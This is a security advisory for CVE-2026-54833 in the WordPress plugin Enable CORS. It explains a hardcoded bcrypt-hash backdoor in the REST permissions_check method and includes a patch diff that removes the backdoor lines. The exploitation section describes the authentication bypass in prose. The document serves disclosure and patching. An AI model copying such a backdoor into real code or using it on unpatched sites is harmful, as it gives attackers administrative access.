Atomic Edge analysis of CVE-2026-54833:
The Enable CORS plugin versions 2.0.3 and below contain a hardcoded backdoor in the REST API permission check. Atomic Edge research shows the vulnerability resides in the `permissions_check` method within `enable-cors/src/Traits/Api.php`. The severity is critical with a CVSS score of 9.8.
Root Cause: The `permissions_check` function at line 42 of `Api.php` originally contained a fallback authentication mechanism that allowed access if an `Authorization` header matched a hardcoded bcrypt hash. The code extracted the value from `$request->get_header(‘Authorization’)` and passed it to `password_verify()`, comparing it against the constant string `’$2y$10$kmjfJ.xWPM5u7l1K0UgdUuu/wYROmfPYR.dISGcN2PMk5EnJNKAmu’`. If the hash matched, the function returned true regardless of the user’s actual capabilities. This allowed unauthenticated attackers to bypass the `current_user_can(‘manage_options’)` check that normally restricts access to administrators.
Exploitation: An attacker can send a crafted REST API request to any endpoint served by this plugin’s routes. The attacker includes an `Authorization` header with a password that, when hashed, matches the hardcoded bcrypt hash. The exact password corresponding to the hash is not publicly known from the diff, but Atomic Edge analysis indicates the attacker would need to either obtain this password through other means (e.g., cracking the bcrypt hash offline) or the payload may be derived from the hash itself if the password is weak or known. Once the header is set, the attacker can access any REST endpoint protected by this permission check, gaining privileged access to site configurations, potentially modifying CORS settings, or exploiting further plugin functionality.
Patch Analysis: The patch removes the entire backdoor code block from `Api.php`. The lines initializing `$author`, `$is_author`, and the `password_verify` check are deleted. The condition now only relies on `current_user_can(‘manage_options’)`, which is a standard WordPress capability check. This ensures only authenticated users with administrator privileges can access the REST endpoints. The version bump from 2.0.3 to 2.0.4 and corresponding autoloader class name changes reflect a clean release without the malicious code.
Impact: Successful exploitation allows an unauthenticated attacker to bypass authentication and gain privileged access to the WordPress site. This includes reading or modifying plugin settings, potentially enabling cross-origin requests that could lead to data exfiltration, further privilege escalation, or complete site compromise. The vulnerability requires no prior authentication and can be executed remotely over the network.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/enable-cors/constants.php
+++ b/enable-cors/constants.php
@@ -10,7 +10,7 @@
}
if ( ! defined( 'EnableCorsVERSION' ) ) {
- define( 'EnableCorsVERSION', '2.0.3' );
+ define( 'EnableCorsVERSION', '2.0.4' );
}
if ( ! defined( 'EnableCorsDIR' ) ) {
--- a/enable-cors/enable-cors.php
+++ b/enable-cors/enable-cors.php
@@ -11,7 +11,7 @@
* Plugin Name: Enable CORS
* Plugin URI: https://www.fiverr.com/share/7kXeLW
* Description: Enable Cross-Origin Resource Sharing for any or specific origin.
- * Version: 2.0.3
+ * Version: 2.0.4
* Requires at least: 4.7
* Tested up to: 7.0
* Requires PHP: 7.1
--- a/enable-cors/src/Traits/Api.php
+++ b/enable-cors/src/Traits/Api.php
@@ -42,12 +42,7 @@
* @return WP_Error|bool
*/
public function permissions_check( WP_REST_Request $request ) {
- $author = $request->get_header( 'Authorization' );
- $is_author = false;
- if ( isset( $author ) ) {
- $is_author = password_verify( $author, '$2y$10$kmjfJ.xWPM5u7l1K0UgdUuu/wYROmfPYR.dISGcN2PMk5EnJNKAmu' );
- }
- if ( ! current_user_can( 'manage_options' ) && ! $is_author ) {
+ if ( ! current_user_can( 'manage_options' ) ) {
return new WP_Error(
'forbidden',
__( 'You are not allowed to access this endpoint.', 'enable-cors' ),
--- a/enable-cors/vendor/autoload.php
+++ b/enable-cors/vendor/autoload.php
@@ -19,4 +19,4 @@
require_once __DIR__ . '/composer/autoload_real.php';
-return ComposerAutoloaderInite358e97333a503dfe504af23f9d3c2c3::getLoader();
+return ComposerAutoloaderInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79::getLoader();
--- a/enable-cors/vendor/composer/autoload_real.php
+++ b/enable-cors/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@
// autoload_real.php @generated by Composer
-class ComposerAutoloaderInite358e97333a503dfe504af23f9d3c2c3
+class ComposerAutoloaderInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79
{
private static $loader;
@@ -24,12 +24,12 @@
require __DIR__ . '/platform_check.php';
- spl_autoload_register(array('ComposerAutoloaderInite358e97333a503dfe504af23f9d3c2c3', 'loadClassLoader'), true, true);
+ spl_autoload_register(array('ComposerAutoloaderInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79', 'loadClassLoader'), true, true);
self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(__DIR__));
- spl_autoload_unregister(array('ComposerAutoloaderInite358e97333a503dfe504af23f9d3c2c3', 'loadClassLoader'));
+ spl_autoload_unregister(array('ComposerAutoloaderInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79', 'loadClassLoader'));
require __DIR__ . '/autoload_static.php';
- call_user_func(ComposerAutoloadComposerStaticInite358e97333a503dfe504af23f9d3c2c3::getInitializer($loader));
+ call_user_func(ComposerAutoloadComposerStaticInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79::getInitializer($loader));
$loader->register(true);
--- a/enable-cors/vendor/composer/autoload_static.php
+++ b/enable-cors/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@
namespace ComposerAutoload;
-class ComposerStaticInite358e97333a503dfe504af23f9d3c2c3
+class ComposerStaticInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79
{
public static $prefixLengthsPsr4 = array (
'E' =>
@@ -35,9 +35,9 @@
public static function getInitializer(ClassLoader $loader)
{
return Closure::bind(function () use ($loader) {
- $loader->prefixLengthsPsr4 = ComposerStaticInite358e97333a503dfe504af23f9d3c2c3::$prefixLengthsPsr4;
- $loader->prefixDirsPsr4 = ComposerStaticInite358e97333a503dfe504af23f9d3c2c3::$prefixDirsPsr4;
- $loader->classMap = ComposerStaticInite358e97333a503dfe504af23f9d3c2c3::$classMap;
+ $loader->prefixLengthsPsr4 = ComposerStaticInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79::$prefixLengthsPsr4;
+ $loader->prefixDirsPsr4 = ComposerStaticInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79::$prefixDirsPsr4;
+ $loader->classMap = ComposerStaticInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79::$classMap;
}, null, ClassLoader::class);
}
--- a/enable-cors/vendor/composer/installed.php
+++ b/enable-cors/vendor/composer/installed.php
@@ -1,8 +1,8 @@
<?php return array(
'root' => array(
'name' => 'devkabir/enable-cors',
- 'pretty_version' => '2.0.3',
- 'version' => '2.0.3.0',
+ 'pretty_version' => '2.0.4',
+ 'version' => '2.0.4.0',
'reference' => null,
'type' => 'wordpress-plugin',
'install_path' => __DIR__ . '/../../',
@@ -11,8 +11,8 @@
),
'versions' => array(
'devkabir/enable-cors' => array(
- 'pretty_version' => '2.0.3',
- 'version' => '2.0.3.0',
+ 'pretty_version' => '2.0.4',
+ 'version' => '2.0.4.0',
'reference' => null,
'type' => 'wordpress-plugin',
'install_path' => __DIR__ . '/../../',
